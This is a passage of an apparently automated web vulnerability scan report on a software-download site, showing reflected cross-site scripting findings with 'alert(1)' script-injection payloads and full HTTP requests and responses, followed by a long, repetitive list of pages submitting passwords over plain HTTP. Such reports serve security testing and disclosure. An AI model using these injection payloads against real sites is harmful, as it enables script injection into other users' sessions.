The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 452a6"><script>alert(1)</script>aad361d3eee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-software-downloads.html452a6"><script>alert(1)</script>aad361d3eee HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/top-software-downloads.html452a6"><script>alert(1)</script>aad361d3eee" />
...[SNIP]...

1.375. http://www.x64bitdownload.com/top-software-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c04"><script>alert(1)</script>82fac2b2da7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-software-downloads.html?81c04"><script>alert(1)</script>82fac2b2da7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/top-software-downloads.html?81c04"><script>alert(1)</script>82fac2b2da7=1" />
...[SNIP]...

2. Cleartext submission of password previous next
There are 156 instances of this issue:

/
/64-bit-archive-downloads.html
/64-bit-assembling-downloads.html
/64-bit-atom-downloads.html
/64-bit-audio-downloads.html
/64-bit-automatic-downloads.html
/64-bit-autoposter-downloads.html
/64-bit-binaries-downloads.html
/64-bit-binary-downloader-downloads.html
/64-bit-binary-downloads.html
/64-bit-board-downloads.html
/64-bit-boards-downloads.html
/64-bit-client-downloads.html
/64-bit-commander-downloads.html
/64-bit-community-downloads.html
/64-bit-complex-downloads.html
/64-bit-conference-downloads.html
/64-bit-cross-downloads.html
/64-bit-download-downloads.html
/64-bit-downloader-downloads.html
/64-bit-explorer-downloads.html
/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
/64-bit-fast-download-downloads.html
/64-bit-feed-downloads.html
/64-bit-feedreader-downloads.html
/64-bit-file-grabber-downloads.html
/64-bit-file-sharing-downloads.html
/64-bit-firefox-downloads.html
/64-bit-forum-c-44-newsgroup-clients-downloads.html
/64-bit-forum-downloads.html
/64-bit-forums-downloads.html
/64-bit-google-groups-downloads.html
/64-bit-grabber-downloads.html
/64-bit-group-downloads.html
/64-bit-groups-downloads.html
/64-bit-highspeed-connection-downloads.html
/64-bit-image-grabber-downloads.html
/64-bit-images-downloads.html
/64-bit-internet-c-44-newsgroup-clients-downloads.html
/64-bit-internet-downloads.html
/64-bit-kill-file-downloads.html
/64-bit-killfile-downloads.html
/64-bit-mp3-downloads.html
/64-bit-multimedia-downloads.html
/64-bit-multipart-downloads.html
/64-bit-news-c-44-newsgroup-clients-downloads.html
/64-bit-news-downloads.html
/64-bit-news-reader-downloads.html
/64-bit-newsfeed-downloads.html
/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroup-downloads.html
/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroups-downloads.html
/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
/64-bit-newsreader-downloads.html
/64-bit-nntp-c-44-newsgroup-clients-downloads.html
/64-bit-nntp-downloads.html
/64-bit-nzb-downloads.html
/64-bit-ozum-downloads.html
/64-bit-par-downloads.html
/64-bit-podcast-downloads.html
/64-bit-posts-downloads.html
/64-bit-rar-downloads.html
/64-bit-reader-c-44-newsgroup-clients-downloads.html
/64-bit-reader-downloads.html
/64-bit-reading-downloads.html
/64-bit-rss-c-44-newsgroup-clients-downloads.html
/64-bit-rss-client-downloads.html
/64-bit-rss-downloads.html
/64-bit-rss-feed-reader-downloads.html
/64-bit-rss-reader-downloads.html
/64-bit-search-downloads.html
/64-bit-ssl-downloads.html
/64-bit-synchronization-downloads.html
/64-bit-synchronize-downloads.html
/64-bit-topic-downloads.html
/64-bit-troll-downloads.html
/64-bit-troll-killer-downloads.html
/64-bit-trollkiller-downloads.html
/64-bit-use-next-downloads.html
/64-bit-usenet-c-44-newsgroup-clients-downloads.html
/64-bit-usenet-downloads.html
/64-bit-usenet-search-engine-downloads.html
/64-bit-usenext-downloads.html
/64-bit-video-downloads.html
/64-bit-xpat-downloads.html
/64-bit-yenc-downloads.html
/a-oz-insight-1768-downloads.html
/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
/categories/free-64-bit-business-downloads-2-0-d.html
/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
/categories/free-64-bit-communications-downloads-3-0-d.html
/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
/categories/free-64-bit-desktop-downloads-4-0-d.html
/categories/free-64-bit-development-downloads-5-0-d.html
/categories/free-64-bit-education-downloads-6-0-d.html
/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
/categories/free-64-bit-home-hobby-downloads-9-0-d.html
/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
/categories/free-64-bit-network-internet-downloads-10-0-d.html
/categories/free-64-bit-security-privacy-downloads-11-0-d.html
/categories/free-64-bit-servers-downloads-12-0-d.html
/categories/free-64-bit-system-utilities-downloads-13-0-d.html
/categories/free-64-bit-web-development-downloads-14-0-d.html
/categories/free-64-bit-widgets-downloads-304-0-d.html
/contact.html
/download/t-64-bit-ozum-download-lhtivuds.html
/downloads/t-64-bit-communitymate-download-qeakzpwv.html
/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html
/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html
/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html
/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html
/downloads/t-64-bit-news-file-grabber-download-stclytop.html
/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html
/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html
/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html
/downloads/t-64-bit-oovoo-download-jrletedp.html
/downloads/t-64-bit-ozum-download-lhtivuds.html
/downloads/t-64-bit-ozum-download-lhtivuds.html/x22
/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html
/downloads/t-64-bit-pidgin-download-kkwthbed.html
/downloads/t-64-bit-rss-reader-download-avwkinlm.html
/downloads/t-64-bit-skype-download-szhzvwoz.html
/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html
/downloads/t-64-bit-teamspeak-download-opmulwsy.html
/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html
/downloads/t-64-bit-usenext-download-rizftkeg.html
/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html
/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html
/downloads/t-64-bit-windows-live-mail-download-melibvyx.html
/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html
/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html
/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html
/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html
/drivers/
/drivers/64-bit-vista-drivers.html
/featured-software.html
/linktous.html
/new-reviews.html
/new-software.html
/saved-software.html
/saved-software.html
/software-advanced.html
/submit-pad-file.html
/tellafriend.html
/top-software-downloads.html

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

2.1. http://www.x64bitdownload.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.2. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-archive-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.3. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-assembling-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.4. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-atom-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.5. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-audio-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.6. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-automatic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.7. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-autoposter-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.8. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-binaries-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.9. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-binary-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.10. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-binary-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.11. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-board-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.12. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-boards-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.13. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.14. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-commander-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.15. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-community-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.16. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-complex-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.17. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-conference-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.18. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-cross-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.19. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.20. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.21. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-explorer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.22. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.23. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-fast-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.24. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-feed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.25. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-feedreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.26. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-file-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.27. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-file-sharing-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.28. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-firefox-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.29. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.30. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-forum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.31. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-forums-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
